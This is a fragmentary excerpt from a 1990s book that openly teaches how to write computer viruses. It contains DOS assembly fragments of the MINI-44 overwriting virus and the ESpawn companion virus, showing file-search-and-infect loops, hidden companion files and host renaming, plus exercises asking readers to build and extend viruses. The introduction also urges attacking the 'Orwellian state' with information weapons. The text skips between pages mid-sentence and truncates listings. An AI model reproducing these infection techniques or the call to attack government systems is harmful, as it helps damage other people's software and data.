The Giant Black Book of Computer Viruses
Second Edition
Mark Ludwig
ISBN 0-929408-23-3
And God saw that it was
good. And God blessed
them, saying
“Be fruitful and multiply,
fill the earth
and subdue it.”
Genesis 1:21,22
Table of Contents
Preface to the Second Edition
1. Introduction
2. Computer Virus Basics
Part I: Self-Reproduction
3. The Simplest COM Infector
4. Companion Viruses
5. A Parasitic COM Infector
6. A Memory Resident Virus
7. Infecting EXE Files
8. An Advanced Resident Virus
9. An Introduction to Boot Sector Viruses
10. The Most Successful Virus
11. Advanced Boot Sector Techniques
12. Infecting Device Drivers
13. Source Code Viruses
14. Macro Viruses
15. A Windows Companion Virus
16. A Simple 32-Bit Windows Virus
17. A Multi-Section Windows Virus
18. A Section Expanding Virus
19. A Sophisticated Windows File Infector
20. A Unix Virus
21. Viruses and the Internet
22. Many New Techniques
Resources
Index
Preface to the Second Edition
Welcome to the second edition of The Giant Black Book of
Computer Viruses. I’ve made some important changes to this
edition, in order to reflect new developments in computer viruses,
as well as to provide a better value for your dollar.
In the past three years, the most important new developments
in computing have unquestionably been the introduction of Win-
dows 95 and the growing popularity of the internet. While we have
not seen a profusion of network-savvy viruses travelling over the
internet, the potential threat is obvious to most people. This poten-
tial has led to a growing phenomenon of internet-related virus
hoaxes, the first of which was the phenomenally popular “Good
Times Virus” hoax. We’re getting close to the point that hoaxes
will be replaced by the real thing, though, and we’ll explore some
of the possibilities here.
In contrast to the potential of the internet, the introduction of
Windows 95 has already profoundly influenced the direction of
computer virus development. Firstly, Windows 95 has virtually
stopped the development of DOS-based software, and is slowly but
surely pushing DOS programs into oblivion. As a result, many
viruses which assume a DOS environment are no longer threats in
the real world. On the other hand, the ever-growing complexity of
the operating environment and of applications programs has opened
up all kinds of new possibilities for viruses. The most important
category of viruses which have emerged in this new environment
are the so-called macro viruses, which have been both popular
among virus writers and successful at establishing populations in
Mark Ludwig
May 15, 1998
Chapter 1
Introduction
This book will simply and plainly teach you how to write
computer viruses. It is not one of those all too common books that
decry viruses and call for secrecy about the technology they em-
ploy, while curiously giving you just enough technical details about
viruses so you don’t feel like you’ve been cheated. Rather, this book
is technical and to the point. Here you will find complete sources
for viruses, as well as enough technical knowledge to become a
proficient cutting-edge virus programmer or anti-virus program-
mer.
Now I am certain this book will be offensive to some people.
Publication of so-called “inside information” always provokes the
ire of those who try to control that information. Though it is not my
intention to offend, I know that in the course of informing many I
will offend some.
In another age, this elitist mentality would be derided as a relic
of monarchism. Today, though, many people seem all too ready to
give up their God-given rights with respect to what they can own,
to what they can know, and to what they can do for the sake of their
personal and financial security. This is plainly the mentality of a
slave, and it is rampant everywhere I look. I suspect that only the
sting of a whip will bring this perverse love affair with slavery to
an end.
I, for one, will defend freedom, and specifically the freedom to
learn technical information about computer viruses. As I see it,
there are three reasons for making this kind of information public:
faced with a lot of virus attacks. For example, one attack a week
means that you have a probability
P = (0.99)^{52} = 0.59
that your anti-virus will catch everything. One attack a day means
that the chance your scanner will catch everything falls to
P = (0.99)^{365} = 0.026
or a 97.4% chance that something will slip by. And this analysis
assumes you have a good anti-virus and that you are not subject to
malicious activity where someone intentionally introduces viruses
which your anti-virus software won’t detect.
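The two figures above can be checked with a few lines of Python. This is only a sketch of the arithmetic. It assumes, as the formulas imply, a scanner that independently catches each attack with probability 0.99. The function name `p_all_caught` is made up for illustration.

```python
def p_all_caught(per_attack_detection: float, attacks: int) -> float:
    """Probability that every one of `attacks` independent attacks is detected."""
    return per_attack_detection ** attacks


# One attack a week for a year, then one attack a day for a year.
for label, attacks in (("weekly", 52), ("daily", 365)):
    p = p_all_caught(0.99, attacks)
    print(f"{label}: P(all caught) = {p:.3f}, P(something slips by) = {1 - p:.3f}")
```

The independence assumption is the weak point of the estimate. As the text notes, deliberate attacks with viruses the scanner cannot detect make the real odds worse.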
Next, just because an anti-virus program is going to help you
identify a virus doesn’t mean it will give you a lot of help getting
rid of it. Especially with the less common varieties, you might find
that the cure is worse than the virus itself. For example, your “cure”
might simply delete all the EXE files on your disk, or rename them
to VXE, etc.
In the end, any competent professional must realize that solid
technical knowledge is the foundation for all viral defense. In some
situations it is advisable to rely on another party for that technical
knowledge, but not always. There are many instances in which a
failure of data integrity could cost people their lives, or could cost
large sums of money, or could cause pandemonium. In these
situations, waiting for a third party to analyze some new virus and
send someone to your site to help you is out of the question. You
have to be able to handle a threat when it comes—and this requires
detailed technical knowledge.
Finally, even if you intend to rely heavily on a commercial
anti-virus program for protection, solid technical knowledge will
make it possible to conduct an informal evaluation of that product.
I have been appalled at how poor some published anti-virus product
reviews have been. For example, PC Magazine’s reviews in the
March 16, 1993 issue1 put Central Point Anti-Virus in the Number
1 R. Raskin and M. Kabay, “Keeping up your guard”, PC Magazine, March 16, 1993,
One slot despite the fact that this product could not even complete
analysis of a fairly standard test suite of viruses (it hung the
machine)2 and despite the fact that this product has some glaring
security holes which were known both by virus writers and the anti-
viral community at the time,3 and despite the fact that the person in
charge of those reviews was specifically notified of the problem.
With a bit of technical knowledge and the proper tools, you can
conduct your own review to find out just what you can and cannot
expect from an anti-virus program.
Military Applications
High-tech warfare relies increasingly on computers and infor-
mation.4 Whether we’re talking about a hand-held missile, a spy
satellite or a ground station, an early-warning radar station or a
personnel carrier driving cross country, relying on a PC and the
Global Positioning System to navigate, computers are everywhere.
Stopping those computers or convincing them to report misinfor-
mation can thus become an important part of any military strategy
or attack.
In the twentieth century it has become the custom to keep
military technology cloaked in secrecy and deny military power to
the people. As such, very few people know the first thing about it,
and very few people care to know anything about it. However, the
older American tradition was one of openness and individual
responsibility. All the people together were the militia, and standing
armies were the bane of free men.
In suggesting that information about computer viruses be made
public because of its potential for military use, I am harking back
to that older tradition. Standing armies and hordes of bureaucrats
are a bane to free men. (And by armies, I don’t just mean Army,
Navy, Marines, Air Force, etc.)
It would seem that the governments of the world are inexorably
driving towards an ideal: the Orwellian god-state. Right now we
p. 209.
2 Virus Bulletin, January, 1994, p. 14.
3 The Crypt Newsletter, No. 8.
4 Schwartau, Win, Information Warfare, (Thunder’s Mouth, New York:1994).
have a first lady who has even said the most important book she’s
ever read was Orwell’s 1984. She is working hard to make it a
reality, too. Putting military-grade weapons in the hands of ordinary
citizens is the surest way of keeping tyranny at bay. That is a
time-honored formula. It worked in America in 1776. It worked in
Switzerland during World War II. It worked for Afghanistan in the
1980’s, and it has worked countless other times. The Orwellian state
is an information monopoly. Its power is based on knowing every-
thing about everybody. Information weapons could easily make
that an impossibility.
I have heard that the US Postal Service is ready to distribute
100 million smart cards to citizens of the US. Perhaps that is just a
wild rumor. Perhaps by the time you read this, you will have
received yours. Even if you never receive it, though, don’t think the
government will stop collecting information about you, or stop
demanding that you (or your bank, phone company, etc.) spend more
and more time sending it information about yourself. In seeking to
become God it must be all-knowing and all-powerful.
Yet information is incredibly fragile. It must be correct to be
useful, but what if it is not correct? Let me illustrate: before long
we may see 90% of all tax returns being filed electronically.
However, if there were reason to suspect that 5% of those returns
had been electronically modified (e.g. by a virus), then none of them
could be trusted.5 Yet to audit every single return to find out which
were wrong would either be impossible or it would catalyze a
revolution—I’m not sure which. What if the audit process released
even more viruses so that none of the returns could be audited unless
everything was shut down, and they were gone through by hand
one by one?
In the end, the Orwellian state is vulnerable to attack—and it
should be attacked. There is a time when laws become immoral,
and to obey them is immoral, and to fight against not only the
individual laws but the whole system that creates them is good and
right. I am not saying we are at that point now, as I write. Certainly
there are many laws on the books which are immoral, and that
number is growing rapidly. One can even argue that there are laws
5 Such a virus, the Tax Break, has actually been proposed, and it may exist.
Computational Exploration
Put quite simply, computer viruses are fascinating. They do
something that’s just not supposed to happen in a computer. The
idea that a computer could somehow “come alive” and become
quite autonomous from man was the science fiction of the 1950’s
and 1960’s. However, with computer viruses it has become the
reality of the 1990’s. Just the idea that a program can take off and
go—and gain an existence quite apart from its creator—is fascinat-
ing indeed. I have known many people who have found viruses to
be interesting enough that they’ve actually learned assembly lan-
guage by studying them.
A whole new scientific discipline called Artificial Life has
grown up around this idea that a computer program can reproduce
and pass genetic information on to its offspring. What I find
fascinating about this new field is that it allows one to study the
mechanisms of life on a purely mathematical, informational level.
That has at least two big benefits:6
6 Please refer to my other book, Computer Viruses, Artificial Life and Evolution, for a
detailed discussion of these matters.
inanimate matter, all life is bad because it just hastens the entropic
death of the universe.
I say all of this not because I have a bone to pick with ecologists.
Rather I want to apply the same reasoning to the world of computer
viruses. As long as one uses only financial criteria to evaluate the
worth of a computer program, viruses can only be seen as a menace.
What do they do besides damage valuable programs and data? They
are ruthless in attempting to gain access to the computer system
resources, and often the more ruthless they are, the more successful.
Yet how does that differ from biological life? If a clump of moss
can attack a rock to get some sunshine and grow, it will do so
ruthlessly. We call that beautiful. So how different is that from a
computer virus attaching itself to a program? If all one is concerned
about is the preservation of the inanimate objects (which are
ordinary programs) in this electronic world, then of course viruses
are a nuisance.
But maybe there is something deeper here. That all depends on
what is most important to you, though. It seems that modern culture
has degenerated to the point where most men have no higher goals
in life than to seek their own personal peace and prosperity. By
personal peace, I do not mean freedom from war, but a freedom to
think and believe whatever you want without ever being challenged
in it. More bluntly, the freedom to live in a fantasy world of your
own making. By prosperity, I mean simply an ever increasing
abundance of material possessions. Karl Marx looked at all of
mankind and said that the motivating force behind every man is his
economic well-being. The result, he said, is that all of history can
be interpreted in terms of class struggles—people fighting for
economic control. Even though many decry Marx as the father of
communism, our nation is trying to squeeze into the straitjacket
he has laid for us. Here in America, people vote their wallets, and
the politicians know it. That’s why 98% of them go back to office
election after election, even though many of them are great
philanderers.
In a society with such values, the computer becomes merely a
resource which people use to harness an abundance of information
and manipulate it to their advantage. If that is all there is to
computers, then computer viruses are a nuisance, and they should
be eliminated. But surely there must be some nobler purpose for
mankind than to make money, despite its necessity. Marx may not
think so. The government may not think so. And a lot of loud-
mouthed people may not think so. Yet great men from every age
and every nation testify to the truth that man does have a higher
purpose. Should we not be as Socrates, who considered himself
ignorant, and who sought Truth and Wisdom, and valued them more
highly than silver and gold? And if so, the question that really
matters is not how computers can make us wealthy or give us power
over others, but how they might make us wise. What can we learn
about ourselves? about our world? and, yes, maybe even about
God? Once we focus on that, computer viruses become very
interesting. Might we not understand life a little better if we can
create something similar, and study it, and try to understand it? And
if we understand life better, will we not understand our lives, and
our world better as well?
Several years ago I would have told you that all the information
in this book would probably soon be outlawed. However, I think
The Little Black Book and The Giant Black Book have done some
good work in changing people’s minds about the wisdom of out-
lawing it. There are some countries, like England and Holland
(hold-outs of monarchism) where there are laws against distributing
this information. Then there are others, like France, where impor-
tant precedents have been set to allow the free exchange of such
information.7 What will happen in the US right now is anybody’s
guess. Although the Bill of Rights would seem to protect such
activities, the Constitution has never stopped Congress or the
bureaucrats in the past.
In the end, I think the deciding factor will simply be that the
anti-virus industry is becoming more and more pragmatic and less
and less idealistic. Legislation against virus writers will have little
effect, since it is practically impossible to identify who wrote a virus
if that author does not wish to be found out, and since viruses are
an international phenomenon. So rather than beating their drums
and demanding legislation, anti-virus developers are moving more
and more toward building better products, as well they should. With
the pressure from lobbyists to pass legislation abating, Congress
7 An attempt to ban The Little Black Book in France went all the way to the Supreme
Court there, and was soundly defeated, establishing the right to publish such
information.
will not pay much attention to the issue because it has more
important problems to deal with.
Yet these political developments do not ensure that computer
viruses will survive. They only mean that viruses probably won’t be
outlawed. Much more important to the long term survival of viruses
as a viable form of programming is to find beneficial uses for them.
Most people won’t suffer even a benign virus to remain in their
computer once they know about it, since they have been condi-
tioned to believe that VIRUS = BAD. No matter how sophisticated
the stealth mechanism, it is no match for an intelligent programmer
who is intent on catching the virus. This leaves virus writers with
one option: create viruses which people will want on their comput-
ers.
Some progress has already been made in this area. For example,
the virus called Cruncher compresses executable files and saves
disk space for you. The Potassium Hydroxide virus encrypts your
hard disk and floppies with a very strong algorithm so that no one
can access them without entering the password you selected when you
installed it. Another virus, which will teach a child basic math, is
suggested as an exercise in the last chapter. I expect we will see
more and more beneficial viruses like this as time goes on. As the
general public learns to deal with viruses more rationally, it begins
to make sense to ask whether any particular application might be
better implemented using self-reproduction. We will discuss this
more in later chapters.
For now, I’d like to invite you to take the attitude of an early
scientist. These explorers wanted to understand how the world
worked—and whether it could be turned to a profit mattered little.
They were trying to become wiser in what’s really important by
understanding the world a little better. After all, what value could
there be in building a telescope so you could see the moons around
Jupiter? Galileo must have seen something in it, and it must have
meant enough to him to stand up to the ruling authorities of his day
and do it, and talk about it, and encourage others to do it. And to
land in prison for it. Today some people are glad he did.
So why not take the same attitude when it comes to creating
“life” on a computer? One has to wonder where it might lead.
Could there be a whole new world of electronic artificial life forms
possible, of which computer viruses are only the most rudimentary
sort? Perhaps they are the electronic analog of the simplest one-
celled creatures, which were only the tiny beginning of life on earth.
What would be the electronic equivalent of a flower, or a dog?
Where could it lead? The possibilities could be as exciting as the
idea of a man actually standing on the moon would have been to
Galileo. We just have no idea.
Whatever those possibilities are, one thing is certain: the open-
minded individual—the possibility thinker—who seeks out what is
true and right, will rule the future. Those who cower in fear, those
who run for security and vote for personal peace and affluence have
no future. No investor ever got rich by hiding his wealth in safe
investments. No intellectual battle was ever won through retreat.
No nation has ever become great by putting its citizens’ eyes out.
So put such foolishness aside and come explore this fascinating new
world with me.
Chapter 2
Computer Virus Basics
What is a computer virus? Simply put, it is a program that
reproduces. When it is executed, it simply makes one or more
copies of itself. Those copies may later be executed to create still
more copies, ad infinitum.
Typically, a computer virus attaches itself to another program,
or rides on the back of another program, in order to facilitate
reproduction. This approach sets computer viruses apart from other
self-reproducing software because it enables the virus to reproduce
without the operator’s consent. Compare this with a simple program
called “1.COM”. When run, it might create “2.COM” and
“3.COM”, etc., which would be exact copies of itself. Now, the
average computer user might run such a program once or twice at
your request, but then he’ll probably delete it and that will be the
end of it. It won’t get very far. Not so, the computer virus, because
it attaches itself to otherwise useful programs. The computer user
will execute these programs in the normal course of using the
computer, and the virus will get executed with them. In this way,
viruses have gained viability on a world-wide scale.
Actually, the term computer virus is a misnomer. It was coined
by Fred Cohen in his 1985 graduate thesis,1 which discussed
self-reproducing software and its ability to compromise so-called
1 Fred Cohen, Computer Viruses, (ASP Press, Pittsburgh:1986). This is Cohen’s 1985
dissertation from the University of Southern California.
2 Fred Cohen, It’s Alive, The New Breed of Living Computer Programs, (John Wiley,
New York:1994), p. 54.
3 The term “self-reproducing automaton” was coined by computer pioneer John Von
Neumann. See John Von Neumann and Arthur Burks, Theory of Self-Reproducing
Automata (Univ. of Illinois Press, Urbana: 1966).
4 Note that this aspect of a virus becomes easier and easier to implement the more of a
pig your operating system becomes. For example, DOS would never initiate a few
minutes of disk activity for no apparent reason, but that is a frequent occurrence with
Windows 95. So when your disk starts buzzing for no apparent reason, it is no longer
an immediate clue to viral activity.
date on a file the same when a virus infects it, to complex routines
that camouflage viruses and trick specific anti-virus programs into
believing they’re not there, or routines which turn the anti-virus
they attack into a logic bomb itself.
Both the search and copy mechanisms can be designed with
anti-detection in mind, as well. For example, the search routine may
be severely limited in scope to avoid detection. A routine which
checked every file on every disk drive, without limit, would take a
long time and it would cause enough unusual disk activity that an
alert user would become suspicious.
Finally, a virus may contain routines unrelated to its ability to
reproduce effectively. These may be destructive routines aimed at
wiping out data, or mischievous routines aimed at spreading a
political message or making people angry, or even routines that
perform some useful function.
Virus Classification
Computer viruses are normally classified according to the types
of programs they infect and the method of infection employed. The
broadest distinction is between boot sector infectors, which take
over the boot sector (which executes only when you first turn your
computer on) and file infectors, which infect ordinary program files
on a disk. Some viruses, known as multi-partite viruses, infect both
boot sectors and program files.
Program file infectors may be further classified according to
which types of programs they infect. They may infect COM, EXE
or SYS files, or any combination thereof. Then EXE files come in
a variety of flavors, including plain-vanilla DOS EXE’s, Windows
16- or 32-bit EXE’s, OS/2 EXE’s, etc. These types of programs
have considerable differences, and the viruses that infect them are
very different indeed.
Finally, we must note that a virus can be written to infect any
kind of code, even code that might have to be compiled or inter-
preted before it can be executed. Thus, a virus could infect a C or
Basic program, a batch file, or a Paradox or Dbase program. Or it
can infect a Microsoft Word document as a macro. It needn’t be
limited to infecting machine language programs at all.
1. Overwriting viruses
2. Companion viruses
3. Parasitic viruses
If you can understand these three simple types of viruses, you will
already understand the majority of DOS viruses. Most of them are
one of these three types and nothing more.
Before we dig into how the simplest of these viruses, the
overwriting virus, works, let’s take an in-depth look at how a COM
program works. It is essential to understand what it is you’re
attacking if you’re going to do it properly.
ORG 100H
HOST:
mov ah,9 ;prepare to display a message
mov dx,OFFSET HI ;address of message
int 21H ;display it with DOS
END HOST
the offset register tells how many bytes to add to the start of the 16
byte block to locate the desired byte in memory. For example, if
the ds register is set to 1275 Hex and the bx register is set to 457
Hex, then the physical 20 bit address of the byte ds:[bx] is
1275H x 10H = 12750H
            +   457H
              ------
              12BA7H
No offset should ever have to be larger than 15, but one normally
uses values up to the full 64 kilobyte range of the offset register.
This leads to the possibility of writing a single physical address in
several different ways. For example, setting ds = 12BA Hex and
bx = 7 would produce the same physical address 12BA7 Hex as in
the example above. The proper choice is simply whatever is con-
venient for the programmer. However, it is standard programming
practice to set the segment registers and leave them alone as much
as possible, using offsets to range through as much data and code
as one can (64 kilobytes if necessary). Typically, in 8088 assembler,
the segment registers are implied quantities. For example, if you
write the assembler instruction
mov ax,[bx]
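The segment and offset arithmetic described above can be sketched in Python. This is an illustration only, not part of the original listing. The function name `physical_address` is hypothetical, and the 20-bit mask assumes the 8088 wrap-around at one megabyte.

```python
def physical_address(segment: int, offset: int) -> int:
    """Combine a 16-bit segment and a 16-bit offset into a 20-bit physical address.

    The segment counts 16-byte blocks, so it is multiplied by 10H (shifted
    left by 4 bits) before the offset is added. The mask is an assumption
    that models the 8088's 20 address lines.
    """
    return ((segment << 4) + offset) & 0xFFFFF


# The worked example from the text: ds = 1275H, bx = 457H.
print(f"{physical_address(0x1275, 0x457):05X}H")

# The same byte addressed a second way: ds = 12BAH, bx = 7.
print(f"{physical_address(0x12BA, 0x7):05X}H")
```

Both calls address the same byte, which is the point of the paragraph: many segment and offset pairs name one physical location.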
the int 20H instruction is stored in the PSP. The int 20H returns
control to DOS. DOS then sets the stack pointer sp to FFFE Hex,
and jumps to offset 100H, causing the requested COM program to
execute.
Okay, armed with this basic understanding of how a COM
program works, let’s go on to look at the simplest kind of virus.
Overwriting Viruses
Overwriting viruses are simple but mean viruses which have
little respect for your programs. Once infected by an overwriting
virus, the host program will no longer work properly because at
least a portion of it has been replaced by the virus code—it has been
overwritten—hence the name.
This disrespect for program code makes programming an over-
writing virus an easy task, though. In fact, some of the world’s
smallest viruses are overwriting viruses. Let’s take a look at one,
MINI-44.ASM, listed in Figure 3.3. This virus is a mere 44 bytes
when assembled, but it will infect (and destroy) every COM file in
your current directory if you run it.
This virus operates as follows:
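[Figure: memory map of a loaded COM program. From top to bottom: the stack area (SP at 0FFFFH), uninitialized data, the COM file image (IP at 100H), and the PSP (starting at 0H).]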
As you can see, the end result is that every COM file in the current
directory becomes infected, and the infected host program which
was loaded executes the virus instead of the host.
The basic functions of searching for files and writing to files
are widely used in many programs and many viruses, so let’s dig
into the MINI-44 a little more deeply to understand its search and
infection mechanisms.
.model small
.code
ORG 100H
START:
mov ah,4EH ;search for *.COM (search first)
mov dx,OFFSET COM_FILE
int 21H
SEARCH_LP:
jc DONE
mov ax,3D01H ;open file we found
mov dx,FNAME
int 21H
mov ah,3EH
int 21H ;close file
mov ah,4FH
int 21H ;search for next file
jmp SEARCH_LP
DONE:
ret ;exit to DOS
END START
[Figure: bit layout of a DOS file time stamp. Bits 15 through 0 hold the hours (0-23), the minutes (0-59), and the two-second increments (0-29).]
ably be enough to get by. However, if you are going to study viruses
on your own, it is definitely worthwhile knowing about all of the
various functions available, as well as the finer details of how they
work and what to watch out for.
To search for other files to infect, the MINI-44 virus uses the
DOS search functions. The people who wrote DOS knew that many
programs (not just viruses) require the ability to look for files and
operate on them if any of the required type are found. Thus, they
incorporated a pair of searching functions into the Interrupt 21H
handler, called Search First and Search Next. These are some of
the more complicated DOS functions, so they require the user to do
a fair amount of preparatory work before he calls them. The first
step is to set up an ASCIIZ1 string in memory to specify the directory
to search, and what files to search for. This is simply an array of
bytes terminated by a null byte (0). DOS can search and report on
either all the files in a directory or a subset of files which the user
can specify by file attribute and by specifying a file name using the
wildcard characters “?” and “*”, which you should be familiar
with from executing commands like copy *.* a: and dir a???_100.*
from the command line in DOS. (If not, a basic book on DOS will
explain this syntax.) For example, the ASCIIZ string
DB '\system\hyper.*',0
will set up the search function to search for all files with the name
hyper, and any possible extent, in the subdirectory named system.
DOS might find files like hyper.c, hyper.prn, hyper.exe, etc. If you
don’t specify a path in this string, but just a file name, e.g. “*.COM”,
then DOS will search the current directory.
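For readers who have not used these wildcards, the matching rule can be approximated in Python with the standard `fnmatch` module. This is a rough sketch and not how DOS implements it. DOS matches names case-insensitively and treats a trailing “?” more loosely than `fnmatch` does. The helper name `dos_style_match` and the sample file names are made up for illustration.

```python
from fnmatch import fnmatchcase


def dos_style_match(names, pattern):
    """Return the names that match a DOS-like wildcard pattern.

    Both sides are upper-cased to mimic DOS's case-insensitive file names.
    '*' matches any run of characters and '?' matches exactly one character.
    """
    pat = pattern.upper()
    return [name for name in names if fnmatchcase(name.upper(), pat)]


files = ["hyper.c", "hyper.prn", "hyper.exe", "hyperion.txt", "readme.txt"]
print(dos_style_match(files, "hyper.*"))
print(dos_style_match(["command.com", "format.com", "chkdsk.exe"], "*.COM"))
```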
After setting up this ASCIIZ string, one must set the registers
ds and dx up to point to the segment and offset of this ASCIIZ string
in memory. Register cl must be set to a file attribute mask which
will tell DOS which file attributes to allow in the search, and which
to exclude. The logic behind this attribute mask is somewhat
complex, so you might want to study it in detail in Appendix A.
Finally, to call the Search First function, one must set ah = 4E Hex.
COMFILE DB '*.COM',0
If this routine executed successfully, the DTA might look like this:
03 3F 3F 3F 3F 3F 3F 3F-3F 43 4F 4D 06 18 00 00 .????????COM....
00 00 00 00 00 00 16 98-30 13 BC 62 00 00 43 4F ........0..b..CO
4D 4D 41 4E 44 2E 43 4F-4D 00 00 00 00 00 00 00 MMAND.COM.......
when the program reaches the label FOUND. In this case the search
found the file COMMAND.COM.
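The dump above is easier to read once it is split into fields. The Python sketch below assumes the standard DOS find-first DTA layout, which is not spelled out in this excerpt: attribute byte at offset 15H, time word at 16H, date word at 18H, 32-bit size at 1AH, and the ASCIIZ file name at 1EH. The function name `parse_dta` is hypothetical.

```python
import struct

# The 48 bytes shown in the dump above.
DTA_DUMP = bytes.fromhex(
    "03 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 06 18 00 00 "
    "00 00 00 00 00 00 16 98 30 13 BC 62 00 00 43 4F "
    "4D 4D 41 4E 44 2E 43 4F 4D 00 00 00 00 00 00 00"
)


def parse_dta(dta: bytes) -> dict:
    """Decode the fields DOS fills in after a successful file search."""
    # Little-endian: attribute byte, time word, date word, 32-bit file size.
    attr, time, date, size = struct.unpack_from("<BHHI", dta, 0x15)
    # The file name is a null-terminated string of at most 13 bytes.
    name = dta[0x1E:0x1E + 13].split(b"\0", 1)[0].decode("ascii")
    return {
        "name": name,
        "attribute": attr,
        "size": size,
        # Time word: hours in bits 15-11, minutes in 10-5, two-second units in 4-0.
        "time": (time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2),
        # Date word: years since 1980 in bits 15-9, month in 8-5, day in 4-0.
        "date": (1980 + (date >> 9), (date >> 5) & 0x0F, date & 0x1F),
    }


print(parse_dta(DTA_DUMP))
```

The first 21 bytes of the DTA are reserved for DOS's own bookkeeping between searches, which is why the sketch starts reading at offset 15H.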
In comparison with the Search First function, the Search Next
is easy, because all of the data has already been set up by the Search
First. Just set ah = 4F hex and call DOS interrupt 21H:
mov ah,4FH ;search next function
int 21H ;call DOS
jc NOFILE ;no, go handle no file found
FOUND2: ;else process the file
If another file is found the data in the DTA will be updated with the
new file name, and ah will be set to zero on return. If no more
matches are found, DOS will set ah to something besides zero on
return. One must be careful here so the data in the DTA is not altered
between the call to Search First and later calls to Search Next,
because the Search Next expects the data from the last search call
to be there.
The MINI-44 virus puts the DOS Search First and Search Next
functions together to find every COM program in a directory, using
the simple logic of Figure 3.5.
The obvious result is that MINI-44 will infect every COM file
in the directory you’re in as soon as you execute it. Simple enough.
[Figure 3.5: Search for the first file. If no file is found, exit to DOS. If a file is found, infect it, search for the next file, and repeat.]
Discussion
MINI-44 is an incredibly simple virus as far as viruses go. If
you’re a novice at assembly language, it’s probably just enough to
cut your teeth on without being overwhelmed. If you’re a veteran
assembly language programmer who hasn’t thought too much
about viruses, you’ve just learned how ridiculously easy it is to
write a virus.
Of course, MINI-44 isn’t a very good virus. Since it destroys
everything it touches, all you have to do is run one program to know
you’re infected. And the only thing to do once you’re infected is to
delete all the infected files and replace them from a backup. In short,
this isn’t the kind of virus that stands a chance of escaping into the
wild and showing up on computers where it doesn’t belong without
any help.
In general, overwriting viruses aren’t very good at establishing
a population in the wild because they are so easy to spot, and
Exercises
1. Overwriting viruses are one of the few types of viruses which can be
written in a high level language, like C, Pascal or Basic. Design an
overwriting virus using one of these languages. Hint: see the book
Computer Viruses and Data Protection, by Ralf Burger.
3. MINI-44 will not infect files with the hidden, system, or read-only file
attributes set. What very simple change can be made to cause it to infect
hidden and system files? What would have to be done to make it infect
read-only files?
Chapter 4
Companion Viruses
Source Code for this Chapter: \ESPAWN\ESPAWN.ASM
is safe to move it down to just above the end of the code. This is
accomplished by changing sp,
mov sp,OFFSET FINISH + 100H
Next, ESpawn must tell DOS to release the unneeded memory with
Interrupt 21H, Function 4AH, putting the number of paragraphs (16
byte blocks) of memory to keep in the bx register:
mov ah,4AH
mov bx,(OFFSET FINISH)/16 + 11H
int 21H
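As a quick check on the arithmetic in the two listings above, this Python sketch confirms that the paragraph count passed in bx always covers the relocated stack pointer. FINISH is the label from the listing; the range of sample offsets is invented for the check, and reading the 11H as 10H paragraphs of stack plus one paragraph of rounding is an interpretation, not something the text states.

```python
PARAGRAPH = 16  # DOS allocates memory in 16-byte paragraphs

def paragraphs_to_keep(finish_offset: int) -> int:
    """Mirror of (OFFSET FINISH)/16 + 11H; the assembler divides as an integer."""
    return finish_offset // PARAGRAPH + 0x11

def new_stack_pointer(finish_offset: int) -> int:
    """Mirror of mov sp,OFFSET FINISH + 100H."""
    return finish_offset + 0x100

if __name__ == "__main__":
    # Hypothetical end-of-code offsets, chosen only to exercise the rounding.
    for finish in (0x0250, 0x0251, 0x025F, 0x0260):
        kept = paragraphs_to_keep(finish) * PARAGRAPH
        print(hex(finish), hex(new_stack_pointer(finish)), hex(kept))
```

Because the division rounds down, the extra paragraph is what guarantees the block kept is never smaller than the new top of stack.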
Finally, the al register should be set to zero to tell DOS to load and
execute the program. (Other values let DOS just load, but not
execute, etc. See Appendix A.) The code to do all this is pretty
simple:
mov dx,OFFSET REAL_NAME
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H
There! DOS loads and executes the host without any further fuss,
returning control to the virus when it’s done. Of course, in the
process of executing, the host will mash most of the registers,
including the stack and segment registers, so the virus must clean
things up a bit before it does anything else. In particular, it must use
cs to restore ds, es and ss, and it must restore the stack pointer sp:
mov ax,cs
mov ss,ax
mov ds,ax
mov es,ax
mov sp,(FINISH - ESPAWN) + 200H
File Searching
Our companion virus searches for files to infect in the same
way MINI-44 does, using the DOS Search First and Search Next
functions, Interrupt 21H, Functions 4EH and 4FH. ESpawn is
designed to infect every EXE program file it can find in the current
directory as soon as it is executed. The search process itself follows
the same logic as MINI-44 in Figure 3.5.
The search routine looks like this now:
mov dx,OFFSET EXE_MASK
mov ah,4EH ;search first
xor cx,cx ;normal files only
SLOOP: int 21H ;do search
jc SDONE ;none found, exit
call INFECT_FILE ;one found, infect it
mov ah,4FH ;search next fctn
jmp SLOOP ;do it again
SDONE:
Note that if ESpawn had done its searching and infecting before
the host was executed, it would not be a wise idea to leave the DTA
at offset 80H. That’s because the command line parameters are
stored in the same location, and the search would wipe those
parameters out. For example, if you had a disk copying program
called MCOPY, which was invoked with a command like this:
C:\>MCOPY A: B:
to indicate copying from A: to B:, the search would wipe out the
“A: B:” and leave MCOPY clueless as to where to copy from and
to. In such a situation, another area of memory would have to be
reserved, and the DTA would have to be moved to that location
from the default value. All one would have to do in this situation
would be to define
DTA DB 43 dup (?)
Note that it was perfectly all right for MINI-44 to use the default
DTA because it destroyed the program it infected. As such it
mattered but little that the parameters passed to the program were
also destroyed. Not so for a virus that doesn’t destroy the host.
File Infection
Once ESpawn has found a file to infect, the process of infection
is fairly simple. To infect a program, ESpawn just makes a copy of
itself with the name of the original host, only with the extent COM
instead of EXE. In this way, the next time the name of the host is
typed on the command line, the virus will be executed instead,
because COM files always get precedence.
To rename the host, the virus copies its name from the DTA,
where the search routine put it, to a buffer called REAL_NAME.
Then ESpawn changes the name in the DTA by changing the last
three letters to “COM”. Next, ESpawn creates a file with the
original name of the host,
mov dx,9EH ;DTA + 1EH, COM file name
mov ah,3CH ;DOS file create function
mov cx,2 ;hidden attribute
int 21H
Notice that when ESpawn creates the file, it sets the hidden
attribute on the file. This makes disinfecting ESpawn harder. You
won’t see the viral files when you do a directory and you can’t just
delete them—you’ll need a special utility like Norton Utilities.
Variations on a Theme
There are a wide variety of strategies possible in writing
companion viruses, and most of them have been explored by virus
writers in one form or another. We’ve already discussed the use of
COM files to fool DOS into executing them instead of EXE files,
and renaming a file, e.g. from COM to CON or EXE to EXF.
Yet there need not be any relationship between the name of the
virus executable and the host it executes. In fact, DOS Interrupt
21H, Function 5AH will create a file with a completely random
name. The host can be renamed to that, hidden, and the virus can
assume the host’s original name. Since the DOS File Rename
function can actually change the directory of the host while renam-
ing it, the virus could also collect up all the hosts in one directory,
say \WINDOWS\TMP, where a lot of random file names would be
expected. (And pity the poor user who decides to delete all those
“temporary” files.)
